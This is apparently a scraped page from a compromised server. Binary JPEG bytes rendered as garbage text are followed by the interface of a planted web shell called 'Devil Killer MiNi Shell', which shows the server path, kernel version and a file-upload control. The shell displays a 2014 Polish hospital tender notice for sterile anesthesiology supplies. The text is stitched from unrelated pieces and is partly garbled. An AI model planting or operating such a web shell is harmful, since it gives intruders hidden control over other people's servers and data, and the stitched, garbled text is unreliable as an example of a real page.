JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140610/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140610/125079-N-2014.html

<p class="kh_header"><b>Tarnowskie Góry: SUKCESYWNE  DOSTAWY  STERYLNEGO  SPRZĘTU  ANESTEZJOLOGICZNEGO</b><br>
<b>Numer ogłoszenia: 125079 - 2014; data zamieszczenia: 10.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wielospecjalistyczny Szpital Powiatowy Spółka Akcyjna , ul. Pyskowicka 47-51, 42-612 Tarnowskie Góry, woj. śląskie, tel. 32 285 40 58, faks 32 384 54 04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wspsa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny Zakład Opieki Zdrwotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SUKCESYWNE  DOSTAWY  STERYLNEGO  SPRZĘTU  ANESTEZJOLOGICZNEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są sukcesywne dostawy sterylnego sprzętu urologicznego oraz innego sprzętu medycznego jednorazowego użytku . Zamówienie składa się z 10 części tzw. Pakietów, z których każdy stanowi oddzielny przedmiot zamówienia:   
Pakiet 1    Intubacja, tracheotomia
Pakiet 2    Tracheotomia, terapia dożylna, komnikotomia,  resuscytacja
Pakiet 3    Wkłucia centralne, mocowania 
Pakiet 4    Systemy oddechowe, terapia oddechowa
Pakiet 5    Wkłucia centralne, znieczulenia przewodowe 
Pakiet 6    Mocowania rurek intubacyjnych, tracheotomijnych, kończyn 
Pakiet 7    Monitorowanie ciśnienia metodą inwazyjną
Pakiet 8    Zestaw do hemofiltracji,  wkłucia dializacyjne do aparatu AQUARIUS Platinum wersja 6   
Pakiet 9    Jałowy zestaw do wkłuć centralnych
Pakiet 10  Zawory, zestawy, rampy, woda
 2. Szczegółowy opis przedmiotu zamówienia - asortyment oraz ilość znajdują się w załącznikach D.1 - D.10 do SIWZ  - FORMULARZE  CENOWE.
3. Składane oferty muszą  zawierać pełny zakres przedmiotu zamówienia w zakresie danego pakietu.
4. Wykonawca gwarantuje, że przedmiot i warunki realizacji zamówienia w  całym okresie wykonywania umowy będą zgodne z aktualnie obowiązującymi przepisami ustawy o wyrobach medycznych z 20.05.2010r. o wyrobach medycznych (Dz. U. z 2010r. nr 107 poz. 679) oraz z innymi obowiązującymi przepisami  prawnymi w tym zakresie.
5.  Zamawiający zastrzega sobie prawo realizowania zamówień w ilościach uzależnionych od rzeczywistych potrzeb i posiadanych środków oraz do ograniczenia zamówienia w zakresie rzeczowym i ilościowym, co nie jest odstąpieniem od umowy nawet w części.
6. Zamawiający zastrzega sobie prawo do zmiany limitów ilościowych zamawianego asortymentu w stosunku do określonych w poszczególnych pozycjach pakietu, stanowiącego załącznik do umowy zarówno in plus jak i in minus, bez zmiany wartości brutto przedmiotu umowy określonej w § 2 ust. 1 projektu umowy, a Wykonawca wyraża na to zgodę..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.17.10.00-9, 33.18.15.20-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika [E] do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika [E] do SIWZ.
- złożyć wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również  wykonywanych głównych dostaw w okresie ostatnich trzech lat przed upływem terminu składania  ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wraz z podaniem ich  wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane oraz  załączyć dowody, czy zostały wykonane lub są wykonywane należycie. Zamawiający uzna warunek za spełniony jeśli Wykonawca przedstawi wykaz co najmniej dwóch dostaw w przedmiocie zamówienia każda o minimalnej wartości zł brutto wyszczególnionej poniżej: 
dla Pakietu nr 1 -   15 000,00zł
dla Pakietu nr 2 -   60 000,00zł 
dla Pakietu nr 3 -     1 000,00zł 
dla Pakietu nr 4 -   50 000,00zł
dla Pakietu nr 5 -   64 000,00zł
dla Pakietu nr 6 -     2 500,00zł
dla Pakietu nr 7 -     2 000,00zł
dla Pakietu nr 8 -   22 000,00zł
dla Pakietu nr 9 -     1 500,00zł
dla Pakietu nr 10 - 48 000,00zł
W przypadku składania ofert kilka części - Pakietów,  Wykonawca winien przedłożyć wykaz wykonanych dostaw o wartości równej sumie wartości wskazanych powyżej pakietów, na które składa ofertę. Wzór wykazu stanowi załącznik nr [H] do SIWZ
- do oferty należy dołączyć : katalog lub folder producenta w języku polskim zawierający opis przedmiotu zamówienia, w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika [E] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika [E] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika [E] do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1 Wypełniony szczegółowo formularz oferty - część [C] stanowiąca załącznik do SIWZ;
2. Wypełniony formularz cenowy - część [D] stanowiąca załącznik do SIWZ;
3. Wzór oświadczeń - część [E] stanowiąca załącznik do SIWZ;
4. Wzór oświadczeń - część [F] stanowiąca załącznik do SIWZ;
5. Wzór oświadczeń - część [G] stanowiąca załącznik do SIWZ;
6. Wykaz dostaw - część [H] stanowiąca załącznik do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia niniejszej umowy mogą być dokonywane wyłącznie w formie pisemnego aneksu, podpisanego przez obie strony pod rygorem nieważności i będą dopuszczalne w granicach unormowania artykułu 144 ustawy Prawo zamówień publicznych. 
2. Strony dopuszczają zmiany umowy w zakresie:
- numeru katalogowego produktu (zmiana nr kat nie wymaga aneksowania umowy),
- nazwy handlowej produktu przy zachowaniu jego parametrów,
- gdy wystąpi przejściowy brak produktu z przyczyn leżacych po stronie producenta przy jednoczesnym dostarczeniu produktu zamiennego o parametrach nie gorszych od produktu objętego umową,
- gdy produkt zostanie wycofany z rynku, zostanie on zastąpiony produktem równoważnym,
- w przypadku zaprzestania produkcji produkt zastąpiony produktem równoważnym,
- w razie konieczności zmiany miejsca dostawy,
- w przypadku zmiany wielkości opakowania wprowadzonej przez producenta, z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową,
Wszelkie powyższe zmiany po uprzedniej akceptacji osoby odpowiedzialnej merytorycznie za realizację przedmiotu zamówienia.
Powyższe zmiany nie mogą skutkować zmianą ceny jednostkowej, wartosci umowy i nie mogą być niekorzystne dla Zamawiającego.
3. Zamawiający dopuszcza zmiany ceny korzystne dla Zamawiającego wynikające z obniżenia ceny oraz zmiany w przypadku ustawowej zmiany stawki podatku VAT.
     W przypadku zmiany stawki podatku VAT, zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wspsa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Wielospecjalistycznym Szpitalu Powiatowym S.A. w Tarnowskich Górach, ul. Pyskowicka 47-51 w Dział Zamówień Publicznych - budynek administracji.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2014 godzina 10:30, miejsce: w Wielospecjalistycznym Szpitalu Powiatowym S.A. w Tarnowskich Górach, ul. Pyskowicka 47-51 w Sekretariacie - budynek administracji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 -  intubacja, tracheotomia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Asortyment	Ilość	j.m.
1	Rurka intubacyjna z mankietem uszczelniającym niskociśnieniowym w roz. 2,0 - 10,0 wykonana z silikonowanego PCV, mankiet niskociśnieniowy, linia widoczna w pronmieniach RTG, oring dookoła rurki widoczny z każdej strony ułatwiający lokalizację położenia rurki wzglądem laryngoskopu	1000	szt
2	Rurka intubacyjna  bez mankietu uszczelniajacego                       rozm.2,0 - 4,0	10	szt.
3	Rurka intubacyjna do przewlekłej intubacji z mankietem w kształcie stożka z portem do odsysania z przestrzeni podgłośniowej rozm. 6 - 9	10	szt
4	Rurki ustno gardłowe Guedel  rozm.- 0 - 4 z kolorowym kodem barwnym dla oznaczenia rozmiaru	1200	szt
5	Rurka intubacyjna zbrojona niskociśnieniowa jednorazowa 2,0 -9,5,  wnętrze rurki pokryte substancją silikonową ułatwiającą wprowadzanie cewników do odsysania z balonikiem bez znacznika	50	szt.
6	Rurka tracheostomijna z mankietem uszczelniającym z nitką widoczną w promieniach RTG na całej długości i balonikiem zgodnym z rozmiarem rurki, z oznaczeniem rozmiaru rurki na baloniku uszczelniajacym  rozm. od 7,0 - 10,0	100	szt
7	Rurka tracheostomijna z wydłużoną częścią proksymalną / dla osób otyłych/	5	szt.
8	Maska tracheostomijna dla dorosłych	10	szt.
9	Zamknięty zestaw do odsysania wydzieliny z dróg oddechowych stosowany przez min. 48 godz. przeznaczony do rurek intubacyjnych	50	szt.
10	Zamknięty zestaw do odsysania wydzieliny z dróg oddechowych stosowany przez min. 48 godz. przeznaczony do rurek tracheostomijnych	30	szt
11	Czujnik jednorazowy, sterylny, nie zawierjący lateksu, samoprzylepny dla noworodków poniżej 3kg lub dorosłych pow.40kg,	30	szt
12	Czujnik do pomiaru głębokości snu w czasie znieczulenia ogólnego BIS	5	szt
Wymagania Zamawiającego:
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia. 
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.17.10.00-9, 33.18.15.20-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 -  tracheotomia, terapia dożylna, komnikotomia,  resuscytacja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Asortyment	Ilość	j.m.
1	Rurka tracheostomijna z polietylenu w zestawie składającym się z rurki zewnętrznej, łukowato wygiętej i stożkowo zbieżnej, zamocowanej w sposób trwały na kołnierzu,  rurki wewnętrznej z kółkiem ułatwiającym jej swobodne wyciąganie, kapturka zwykłego z płytką wewnątrz przytrzymywaną pierścieniem i kapturka osłonowego, koniec rurki zewnętrznej lekko wyoblony celem uniknięcia podrażnienia ścian tchawicy,pakowane folia-papier sterylne, sterylizowane tlenkiem etylenu, rozm.7,8,9 standard bez otworu	10	szt
2	Rurka tracheostomijna z polietylenu w zestawie składającym się z rurki zewnętrznej, łukowato wygiętej i stożkowo zbieżnej, zamocowanej w sposób trwały na kołnierzu,  rurki wewnętrznej z kółkiem ułatwiającym jej swobodne wyciąganie, kapturka zwykłego z płytką wewnątrz przytrzymywaną pierścieniem i kapturka osłonowego, koniec rurki zewnętrznej lekko wyoblony celem uniknięcia podrażnienia ścian tchawicy,pakowane folia-papier sterylne, sterylizowane tlenkiem etylenu, rozm.7,8,9 przedłużona bez otworu	10	szt
3	Rurka tracheostomijna z polietylenu w zestawie składającym się z rurki zewnętrznej, łukowato wygiętej i stożkowo zbieżnej, zamocowanej w sposób trwały na kołnierzu,  rurki wewnętrznej z kółkiem ułatwiającym jej swobodne wyciąganie, kapturka zwykłego z płytką wewnątrz przytrzymywaną pierścieniem i kapturka osłonowego, koniec rurki zewnętrznej lekko wyoblony celem uniknięcia podrażnienia ścian tchawicy,pakowane folia-papier sterylne, sterylizowane tlenkiem etylenu, rozm.7,8,9 standard z otworem	30	szt
4	Rurka tracheostomijna z polietylenu w zestawie składającym się z rurki zewnętrznej, łukowato wygiętej i stożkowo zbieżnej, zamocowanej w sposób trwały na kołnierzu,  rurki wewnętrznej z kółkiem ułatwiającym jej swobodne wyciąganie, kapturka zwykłego z płytką wewnątrz przytrzymywaną pierścieniem i kapturka osłonowego, koniec rurki zewnętrznej lekko wyoblony celem uniknięcia podrażnienia ścian tchawicy,pakowane folia-papier sterylne, sterylizowane tlenkiem etylenu, rozm.7,8,9 przedłużona z otworem	10	szt
5	Rurka intubacyjna z mankietem niskociśnieniowym silikonowana, z prowadnicą w środku, w roz. 3,0 - 9,0,  wykonana z termoplastycznego PCV, rurka wyprofilowana w kształcie łuku, 15 mm łącznik, wzmocniona drutem kwasoodpornym na całej długości, wtopionym w ścianę rurki, widocznym w pronmieniach RTG, otwór Murphyego, znaczniki głębokości intubacji w postaci podwójnych linii poziomych, oznaczenie rozmiaru rurki w trzech miejscach na rurce w tym na baloniku kontrolnym, na rurce oraz na łąćzniku 15mm, jałowa pakowana pojedyńczo.	350	szt
6	Kompletny zestaw do przezskórnej tracheotomii metodą Griggsa, z wielorazowym peanem, zawierający skalpel, kaniulę z igłą i strzykawką do identyfikacji tchawicy, prowadnicę Seldingera, rozszerzadło oraz rurkę tracheostomijną z mankietem niskociśnieniowym, posiadającą sztywny samoblokujący się mandryn z otworem na prowadnicę Seldingera. Pakowany na jednej, sztywnej tacy umożliwiającej szybkie otwarcie zestawu.	2	op.
7	Uzupełniający zestaw do przezskórnej tracheotomii metodą Griggsa, bez peana, zawierający skalpel, kaniulę z igłą i strzykawką do identyfikacji tchawicy, prowadnicę Seldingera, rozszerzadło oraz rurkę tracheostomijną z mankietem niskociśnieniowym, posiadającą sztywny samoblokujący się mandryn z otworem na prowadnicę Seldingera. Pakowany na jednej, sztywnej tacy umożliwiającej szybkie otwarcie zestawu.	2	op.
8	Zestaw do konikotomii dla dorosłych - kaniula 4,0mm - jednorazowy zestaw ratunkowy, pozwalający uzyskać, w przypadku niedrożności górnych dróg oddechowych, szybki dostęp do tchawicy pacjenta; założenie nie wymaga nacięcia skóry; specjalna konstrukcja rękojeści zabezpiecza przed uszkodzeniem tylnej ścianki tchawicy w momencie wkłucia; dzięki standardowej końcówce o średnicy 15mm umożliwia wentylację przy użyciu worka samorozprężalnego, respiratora lub bezpośrednio ustami; całość sterylna	1	szt
9	Wielorazowa prowadnica do trudnych intubacji CH15 dł.60cm, 70cm oraz CH10 dł.70cm elastyczna, z wygiętym końcem	10	szt
10	Jednorazowa prowadnica intubacyjna do ukształtowania z drutem, sterylna rozm.2,0 - 5,0	250	szt
